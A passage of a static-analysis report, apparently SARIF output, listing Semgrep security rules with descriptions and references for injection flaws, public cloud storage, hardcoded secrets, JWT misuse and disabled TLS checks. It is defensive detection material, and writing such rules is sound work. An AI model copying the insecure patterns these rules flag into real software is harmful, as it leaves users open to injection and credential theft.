Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `DEBUG` detected. Set this by using FLASK_DEBUG environment variable"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_DEBUG"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"help":{"markdown":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket)\n - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/access-control-block-public-access.html)\n","text":"Detected public S3 bucket. This policy allows anyone to have some kind of access to the bucket. The exact level of access and types of actions allowed will depend on the configuration of bucket policy and ACLs. Please review the bucket configuration to make sure they are set with intended values."},"helpUri":"https://semgrep.dev/r/json.aws.security.public-s3-bucket.public-s3-bucket","id":"json.aws.security.public-s3-bucket.public-s3-bucket","name":"json.aws.security.public-s3-bucket.public-s3-bucket","properties":{"precision":"very-high","tags":["CWE-264: CWE CATEGORY: Permissions, Privileges, and Access Controls","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.public-s3-bucket.public-s3-bucket"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside Write. Audit the input to '$CW.Write'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-command-write.dangerous-command-write","id":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","name":"go.lang.security.audit.dangerous-command-write.dangerous-command-write","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-command-write.dangerous-command-write"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Kotlin, it is possible to adopt prepared statements using the `connection.PreparedStatement` class with parameterized queries. For more information, see: [Prepared statements in Kotlin](https://developer.android.com/reference/kotlin/java/sql/PreparedStatement)."},"helpUri":"https://semgrep.dev/r/kotlin.spring.hibernate-sqli.hibernate-sqli","id":"kotlin.spring.hibernate-sqli.hibernate-sqli","name":"kotlin.spring.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"help":{"markdown":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality)\n - [https://www.php.net/manual/en/types.comparisons.php](https://www.php.net/manual/en/types.comparisons.php)\n - [https://www.whitehatsec.com/blog/magic-hashes/](https://www.whitehatsec.com/blog/magic-hashes/)\n","text":"Make sure comparisons involving md5 values are strict (use `===` not `==`) to avoid type juggling issues"},"helpUri":"https://semgrep.dev/r/php.lang.security.md5-loose-equality.md5-loose-equality","id":"php.lang.security.md5-loose-equality.md5-loose-equality","name":"php.lang.security.md5-loose-equality.md5-loose-equality","properties":{"precision":"very-high","tags":["CWE-697: Incorrect Comparison","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.md5-loose-equality.md5-loose-equality"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli)\n - [https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries](https://github.com/jeremyevans/sequel#label-Arbitrary+SQL+queries)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `DB['select * from items where name = ?', name]`"},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.sequel-sqli.sequel-sqli","id":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","name":"ruby.aws-lambda.security.sequel-sqli.sequel-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.sequel-sqli.sequel-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"bcrypt hash detected"},"help":{"markdown":"bcrypt hash detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"bcrypt hash detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","id":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","name":"generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-bcrypt-hash.detected-bcrypt-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/ecr_repository_policy)\n - [https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html](https://docs.aws.amazon.com/lambda/latest/operatorguide/wildcard-permissions-iam.html)\n - [https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html](https://docs.aws.amazon.com/prescriptive-guidance/latest/patterns/monitor-amazon-ecr-repositories-for-wildcard-permissions-using-aws-cloudformation-and-aws-config.html)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted in your ECR repository policy principal. This grants access to all users, including anonymous users (public access). Instead, limit principals, actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","id":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","name":"terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ecr-repository-wildcard-principal.aws-ecr-repository-wildcard-principal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"help":{"markdown":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials)\n - [https://cwe.mitre.org/data/definitions/522.html](https://cwe.mitre.org/data/definitions/522.html)\n","text":"Password is exposed through JWT token payload. This is not encrypted and the password could be compromised. Do not store passwords in JWT tokens."},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","id":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","name":"python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-exposed-credentials.jwt-python-exposed-credentials"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"help":{"markdown":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs)\n - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/](https://cloudsplaining.readthedocs.io/en/latest/glossary/privilege-escalation/)\n","text":"Ensure that actions that can result in privilege escalation are not used. These actions could potentially result in an attacker gaining full administrator access of an AWS account. Try not to use these actions."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","id":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","name":"terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-priv-esc-funcs.no-iam-priv-esc-funcs"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This gets data from session using user inputs. A malicious user may be able to retrieve information from your session that you didn't intend them to. Do not use user input as a session key."},"help":{"markdown":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation)\n - [https://brakemanscanner.org/docs/warning_types/session_manipulation/](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n","text":"## Remediation\nSession manipulation can occur when an application allows user-input in session keys. Since sessions are typically considered a source of truth (e.g. to check the logged-in user or to match CSRF tokens), allowing an attacker to manipulate the session may lead to unintended behavior.\n\n## References\n[Session Manipulation](https://brakemanscanner.org/docs/warning_types/session_manipulation/)\n"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","id":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","name":"ruby.rails.security.audit.avoid-session-manipulation.avoid-session-manipulation","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Allowing an attacker to manipulate the session may lead to unintended behavior."}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"help":{"markdown":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n","text":"Allowing user input to `send_file` allows a malicious user to potentially read arbitrary files from the server. Avoid accepting user input in `send_file` or normalize with `File.basename(...)`"},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-send-file.check-send-file","id":"ruby.rails.security.brakeman.check-send-file.check-send-file","name":"ruby.rails.security.brakeman.check-send-file.check-send-file","properties":{"precision":"very-high","tags":["CWE-73: External Control of File Name or Path","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-send-file.check-send-file"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","id":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","name":"python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-connection-string.python-psycopg2-hardcoded-connection-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"help":{"markdown":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06g-testing-network-communication)\n","text":"The application's App Transport Security (ATS) configuration allows for insecure accessing of HTTP content in WebViews. This means that connections accessed in a WebView may be accessed via HTTP, potentially leaking that data to others on the local network, or to other network devices the network traffic traverses (proxies, firewalls, load balancers, etc)."},"helpUri":"https://semgrep.dev/r/swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","id":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","name":"swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.insecure-communication.ats.ats-insecure-website-load.ATS-insecure-webview-loads"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"transferFrom() can steal allowance of other accounts"},"help":{"markdown":"transferFrom() can steal allowance of other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug)\n - [https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5](https://medium.com/immunefi/redacted-cartel-custom-approval-logic-bugfix-review-9b2d039ca2c5)\n - [https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C](https://etherscan.io/address/0x186E55C0BebD2f69348d94C4A27556d93C5Bd36C)\n","text":"transferFrom() can steal allowance of other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","id":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","name":"solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug","properties":{"precision":"very-high","tags":["CWE-688: Function Call With Incorrect Variable or Reference as Argument","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.redacted-cartel-custom-approval-bug.redacted-cartel-custom-approval-bug"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection)\n - [https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements](https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements)\n","text":"Detected a sequelize statement that is tainted by user-input. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","id":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","name":"javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-injection-express.express-sequelize-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure FSX Lustre file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-lustre-files-ystem.aws-fsx-lustre-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Ensure AWS Redshift cluster is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","id":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","name":"terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-redshift-cluster-encrypted-with-cmk.aws-redshift-cluster-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","id":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","name":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"help":{"markdown":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n","text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","id":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","name":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation 